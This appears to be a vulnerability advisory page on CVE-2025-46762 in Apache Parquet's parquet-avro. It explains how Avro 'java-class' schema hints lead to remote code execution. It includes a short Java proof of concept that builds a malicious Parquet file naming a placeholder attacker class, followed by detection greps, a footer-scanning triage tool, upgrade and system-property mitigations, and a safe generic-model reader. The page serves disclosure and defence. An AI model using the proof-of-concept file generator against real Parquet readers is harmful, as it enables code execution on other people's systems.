How CVE-2025-46762 Works
The vulnerability lives in Apache Parquet's `parquet-avro` module, in how the Avro schema stored in a Parquet file's footer is handled when records are read. Avro schemas may carry reflect/specific hints (`java-class`, `java-key-class`) that name a Java class to be used for a field. When a file is read with the "specific" or "reflect" data model, parquet-avro resolves the named class inside the reading JVM and constructs it, so whoever controls the file controls which class gets loaded and run; that is the RCE. The file carries only the class name, not class bytes, so the named class must already be loadable by the victim JVM. Versions up to 1.15.0 imposed no restriction at all. 1.15.1 introduced the `org.apache.parquet.avro.SERIALIZABLE_PACKAGES` system property to limit which packages may be named, but its default trusted-package list still lets classes from those packages be loaded and executed; that residual exposure is CVE-2025-46762, fixed in 1.15.2. The "generic" model is not affected because it never instantiates classes named in the schema.
DailyCVE Form
Platform: Apache Parquet
Version: ≤1.15.1
Vulnerability: RCE
Severity: Critical
Date: 2025-05-13
What Undercode Say:
Exploitation:
// Malicious Parquet file generator. The file carries no class bytes: its Avro
// schema's "java-class" hint names a class the victim reader must already have
// on its classpath (com.attacker.ExploitClass is a placeholder).
import org.apache.avro.Schema;
import org.apache.avro.SchemaBuilder;
import org.apache.avro.generic.GenericData;
import org.apache.avro.generic.GenericRecord;
import org.apache.hadoop.fs.Path;
import org.apache.parquet.avro.AvroParquetWriter;
import org.apache.parquet.hadoop.ParquetWriter;

Schema schema = SchemaBuilder.record("Payload").fields()
    .name("payload").type()
        .stringBuilder().prop("java-class", "com.attacker.ExploitClass").endString()
        .noDefault()
    .endRecord();

Path outputFile = new Path("payload.parquet");
try (ParquetWriter<GenericRecord> writer = AvroParquetWriter.<GenericRecord>builder(outputFile)
        .withSchema(schema)
        .build()) {
    GenericRecord record = new GenericData.Record(schema);
    record.put("payload", "x"); // any string; a specific/reflect reader resolves the hinted class when converting this field
    writer.write(record);
}
Detection:
Check which parquet-avro version the build pulls in (anything at or below 1.15.1 is affected):
mvn dependency:tree | grep "parquet-avro"
Log analysis: the reader does not log the class it resolves, so the usable signal is a failed or unexpected class resolution surfacing as an exception from the Avro converter. Note that `org.apache.parquet.avro.SpecificData` is not a real class; the Avro model classes are `org.apache.avro.specific.SpecificData` and `org.apache.avro.reflect.ReflectData`:
grep -rE "org\.apache\.(avro\.specific\.SpecificData|avro\.reflect\.ReflectData|parquet\.avro\.AvroRecordConverter)" /var/log/
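A file-level triage check to go with the detection step above, added here as an example; it is not code from the original page or from the Parquet project. It opens only the Parquet footer and looks at the Avro schema JSON that parquet-avro stores there (under the `parquet.avro.schema` key, or the legacy `avro.schema` key) for the Avro reflect/specific class hints. No Avro schema object is built and no record is converted, so the check does not itself go through the vulnerable code path. The class name `ParquetSchemaTriage`, the exit-code convention and the Hadoop filesystem path are my choices.

```java
import java.util.Map;
import java.util.regex.Matcher;
import java.util.regex.Pattern;

import org.apache.hadoop.conf.Configuration;
import org.apache.hadoop.fs.Path;
import org.apache.parquet.hadoop.ParquetFileReader;
import org.apache.parquet.hadoop.util.HadoopInputFile;

/** Flags Parquet files whose embedded Avro schema asks the reader to load a class by name. */
public class ParquetSchemaTriage {

    // Avro reflect/specific hints: "java-class", "java-key-class", "java-element-class".
    // A SpecificData/ReflectData reader resolves the named class while building converters.
    private static final Pattern CLASS_HINT =
        Pattern.compile("\"java-(?:key-|element-)?class\"\\s*:\\s*\"([^\"]+)\"");

    // Footer keys under which parquet-avro stores the writer's Avro schema (current and legacy).
    private static final String[] SCHEMA_KEYS = {"parquet.avro.schema", "avro.schema"};

    /** Pure-string rule, so it can also be applied to schema JSON pulled from logs or quarantine. */
    public static String findHintedClass(String schemaJson) {
        Matcher m = CLASS_HINT.matcher(schemaJson);
        return m.find() ? m.group(1) : null;
    }

    /**
     * Returns the first class name hinted in the file's Avro schema, or null if there is none.
     * Only the footer is read: nothing here instantiates Avro data models or converts records.
     */
    public static String findHintedClass(Path file, Configuration conf) throws Exception {
        try (ParquetFileReader reader = ParquetFileReader.open(HadoopInputFile.fromPath(file, conf))) {
            Map<String, String> kv = reader.getFooter().getFileMetaData().getKeyValueMetaData();
            for (String key : SCHEMA_KEYS) {
                String schemaJson = kv.get(key);
                if (schemaJson == null) {
                    continue;
                }
                String hinted = findHintedClass(schemaJson);
                if (hinted != null) {
                    return hinted;
                }
            }
        }
        return null;
    }

    public static void main(String[] args) throws Exception {
        Configuration conf = new Configuration();
        int flagged = 0;
        for (String arg : args) {
            String hinted = findHintedClass(new Path(arg), conf);
            if (hinted != null) {
                flagged++;
                System.out.println("FLAG  " + arg + "  schema hints class " + hinted);
            } else {
                System.out.println("clean " + arg);
            }
        }
        // Non-zero exit so an ingest pipeline stage can quarantine the batch before any reader touches it.
        System.exit(flagged == 0 ? 0 : 2);
    }
}
```

Run it as a gate in front of the job that actually reads uploaded files. A legitimate producer that relies on Avro stringable types will also trip the rule, which is the point: those files need a reviewed allow-list rather than a reflect/specific reader on untrusted input.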
Mitigation:
1. Upgrade to 1.15.2:
<dependency>
  <groupId>org.apache.parquet</groupId>
  <artifactId>parquet-avro</artifactId>
  <version>1.15.2</version>
</dependency>
2. Runtime protection (1.15.1):
java -Dorg.apache.parquet.avro.SERIALIZABLE_PACKAGES="" -jar app.jk
An empty list leaves no package trusted, so no class named by a schema hint can be loaded. It is a JVM system property, not a Hadoop configuration key, so it has to be passed to every JVM that reads Parquet files from outside the trust boundary (command line or JAVA_TOOL_OPTIONS), not set in core-site.xml.
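The reader-side counterpart to the mitigation steps and to the "generic model is unaffected" point in the explanation above, added here as an example; it is not code from the original page or from the Parquet project. It reads an untrusted file with the Avro generic data model selected explicitly, and its doc comment shows the configurations that stay exposed so they are easy to grep for in your own code. The class name `UntrustedParquetReader` and the record-count task are my choices; it assumes the consumer does not need Avro specific record classes.

```java
import org.apache.avro.generic.GenericData;
import org.apache.avro.generic.GenericRecord;
import org.apache.hadoop.conf.Configuration;
import org.apache.hadoop.fs.Path;
import org.apache.parquet.avro.AvroParquetReader;
import org.apache.parquet.hadoop.ParquetReader;
import org.apache.parquet.hadoop.util.HadoopInputFile;

/** Reads Parquet files from an untrusted source with the data model the advisory calls unaffected. */
public class UntrustedParquetReader {

    /**
     * Counts the records in a file using the Avro generic model.
     *
     * Exposed configurations look like one of these; do not use them on untrusted input:
     *   .withDataModel(ReflectData.get())    // reflect model: resolves "java-class" hints
     *   .withDataModel(SpecificData.get())   // specific model: same lookup
     *   (no withDataModel call at all)       // AvroReadSupport falls back to SpecificDataSupplier
     */
    public static long countRecords(Path file, Configuration conf) throws Exception {
        long n = 0;
        try (ParquetReader<GenericRecord> reader =
                 AvroParquetReader.<GenericRecord>builder(HadoopInputFile.fromPath(file, conf))
                     // Generic model: class hints in the schema are never resolved, so no class is loaded.
                     .withDataModel(GenericData.get())
                     .withConf(conf)
                     .build()) {
            GenericRecord record;
            while ((record = reader.read()) != null) {
                n++;
            }
        }
        return n;
    }

    public static void main(String[] args) throws Exception {
        Configuration conf = new Configuration();
        for (String arg : args) {
            System.out.println(arg + ": " + countRecords(new Path(arg), conf) + " records");
        }
    }
}
```

Selecting the model in code is deliberate: it does not depend on which parquet-avro version the classpath resolves to, and it survives a later dependency bump that reintroduces the specific fallback. On 1.15.1 still launch the JVM with the empty SERIALIZABLE_PACKAGES property from step 2 as well, since other readers in the same process may not set a model.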
Analytics:
- Attack Vector: Network (file upload)
- Complexity: Low (requires reflect/specific mode)
- Privileges: User-level execution
- Patch Gap: 1.15.1 partial fix bypassable
Monitoring:
-- SIEM query for Parquet deserialization events
-- (table and field names are illustrative; map them to your SIEM's schema)
SELECT *
FROM security_logs
WHERE process_name LIKE '%parquet%'
  AND event_type = 'JVM_CLASS_LOAD';
Sources:
Reported By: nvd.nist.gov